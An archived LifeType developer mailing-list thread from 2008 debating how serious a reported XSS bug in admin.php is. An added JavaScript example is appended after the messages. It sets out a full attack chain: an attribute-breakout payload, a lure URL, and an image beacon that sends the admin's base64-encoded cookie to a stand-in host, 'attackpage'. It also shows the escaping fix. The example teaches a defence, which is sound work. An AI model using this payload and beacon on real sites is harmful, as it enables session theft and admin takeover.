[pLog-svn] Lifetype 1.2.8 ...

Jon Daley plogworld at jon.limedaley.com
Mon May 5 10:50:08 EDT 2008


 	I understand that XSS can do stuff, I'd just like to see a 
specific example for this particular bug.  From the example on SecurityFocus, 
it had an empty value="" in the submit tag, which I am assuming is 
a typo, otherwise I don't see how there is anything that can be done on 
the server side to fix it.
 	Can anyone make a bit of javascript that actually gets something 
interesting using this bug?  Then we can look into general purpose 
solutions for fixing it, rather than one input at a time.

On Mon, 5 May 2008, Matt Wood wrote:

> Here is a common exploitation scenario for you...
>
> An attacker is targeting the lifetype.net site; he wants admin.
>
> He knows from emails and reading around that Oscar, Reto, Mark and Jon are
> likely to have admin on that page, so he makes a webpage on GeoCities or
> Google or something.
>
> On this webpage he has javascript (or a meta refresh tag or an HTTP 302)
> that immediately redirects you to lifetype.net/admin.php with some
> javascript payload utilizing the XSS exploit.
>
> This javascript payload can utilize XSS to create an img tag, this img tag
> has a src of http://attackpage/record.php?data=admincredentials-base64ed(orsomething)
> as long as the data fits in the get parameters. You could also
> create a form and have no limit.
>
> Now all the attacker has to do is email each of you telling you that he has
> found a serious bug in lifetype, and he has screenshots on this page
> http://google/blah.(html|php|jpg) (depending on his level of control of the
> site). Maybe he even puts screenshots on there so it doesn't look too
> scary... and uses an iframe to do the actual attack. You would never know
> unless you are monitoring all your traffic through a proxy.
>
> XSS is ALWAYS serious.
>
> On Mon, May 5, 2008 at 1:00 AM, Mark Wu <markplace at gmail.com> wrote:
>
>>>       Can you post an example?  I am still not getting how
>>> the server-side is involved. I understand that if I put
>>> javascript on the admin's site, the javascript would have
>>> access to stuff, but the browser is supposed to block
>>> javascript from grabbing stuff from one site and posting it
>>> to another, right?  So, somehow he grabs stuff via
>>> javascript, posts it to admin.php which then posts stuff to
>>> another site?
>>
>> I have no idea either. Reto, if you can provide an example here, that will
>> be very helpful.
>>
>>>       Sure, that's fine, but as far as I can tell, all inputs
>>> would be susceptible to the same problem, so fixing one
>>> variable isn't really a fix.
>>
>> Not "all" inputs, just those inputs that use the string validator and are
>> not filtered by htmlfilter (strip tags) or are displayed without escaping
>> HTML special characters ...
>>
>> I think quite a few ..
>>
>> Mark
>>
>> _______________________________________________
>> pLog-svn mailing list
>> pLog-svn at devel.lifetype.net
>> http://limedaley.com/mailman/listinfo/plog-svn
>>
>

-- 
Jon Daley
http://jon.limedaley.com/

Truth is beautiful, without doubt; but so are lies.
-- Ralph Waldo Emerson
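
The chain Matt describes above, written out as an added example; this is not code from the thread or from LifeType, and the server side is simulated with string templates so it runs under Node without a browser. It assumes a reflected request parameter named q on admin.php (the real parameter in the SecurityFocus report is not reproduced here), the victim host lifetype.net and the collector http://attackpage/record.php from Matt's scenario. It shows the four pieces Jon asked about: the payload that breaks out of a value="" attribute, the lure URL the attacker's page sends the admin to, the image beacon that carries document.cookie off-site (a plain cross-site image request, which the same-origin policy does not block, so the server side is never involved in the exfiltration), and the one-line escaping fix that neutralises it.

```javascript
// Added example (not LifeType code): reflected XSS in an attribute turned into
// a cookie-stealing image beacon, beside the escaped rendering that stops it.
// ASSUMPTIONS: parameter "q" on admin.php, victim host lifetype.net, attacker
// collector http://attackpage/record.php (the last two from Matt's scenario).

const VICTIM_ADMIN_URL = 'http://lifetype.net/admin.php';
const ATTACKER_RECORD_URL = 'http://attackpage/record.php';

// Vulnerable server side: the request parameter is copied verbatim into the
// value attribute of the submit button.
function renderVulnerable(q) {
  return '<form action="admin.php"><input type="submit" name="q" value="' + q + '"></form>';
}

// Fixed server side: escape the five HTML-significant characters before the
// value goes into the attribute (PHP equivalent: htmlspecialchars($q, ENT_QUOTES)).
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderEscaped(q) {
  return '<form action="admin.php"><input type="submit" name="q" value="' + escapeHtml(q) + '"></form>';
}

// Step 1: the payload. It closes the value attribute and the <input>, then adds
// an <img> whose onerror handler creates a second image whose src carries
// document.cookie (base64) to the attacker's server.
function xssPayload() {
  return '"><img src=x onerror="new Image().src=\'' + ATTACKER_RECORD_URL +
         '?data=\'+btoa(document.cookie)">';
}

// Step 2: the link the lure page (javascript redirect, meta refresh, 302 or a
// hidden iframe) sends the admin to.
function lureUrl() {
  return VICTIM_ADMIN_URL + '?q=' + encodeURIComponent(xssPayload());
}

// Step 3: what the admin's browser requests once the injected onerror runs.
// document.cookie is passed in because there is no DOM here; for ASCII cookies
// btoa() in the browser yields the same base64 as Buffer does.
function beaconUrl(cookie) {
  const b64 = Buffer.from(cookie, 'utf8').toString('base64');
  return ATTACKER_RECORD_URL + '?data=' + encodeURIComponent(b64);
}

// Step 4: what record.php (or simply the attacker's access log) recovers.
function recoverStolenData(url) {
  const b64 = new URL(url).searchParams.get('data');
  return Buffer.from(b64, 'base64').toString('utf8');
}

// Count opening tags in a rendered page: the vulnerable version gains an
// <img>, the escaped one renders the payload as harmless attribute text.
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// Constructed sample admin session; not a real LifeType cookie.
const SAMPLE_COOKIE = 'PHPSESSID=0123456789abcdef; plog_user=admin';

function demo() {
  const reflected = new URL(lureUrl()).searchParams.get('q'); // what admin.php receives
  return {
    vulnerableTags: countTags(renderVulnerable(reflected)), // 3: form, input, img
    escapedTags: countTags(renderEscaped(reflected)),       // 2: form, input
    stolen: recoverStolenData(beaconUrl(SAMPLE_COOKIE)),    // the cookie, verbatim
  };
}

console.log(renderVulnerable(xssPayload()));
console.log(renderEscaped(xssPayload()));
console.log(demo());
```

The point for the "general purpose" fix Jon asks for is in renderEscaped: the escaping belongs at the output site, applied to every value that is interpolated into HTML, not to the one parameter named in the report. Marking the session cookie HttpOnly would additionally take document.cookie out of the payload's reach, but an injected script could still drive admin.php with the admin's session, so it is a mitigation rather than the fix.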
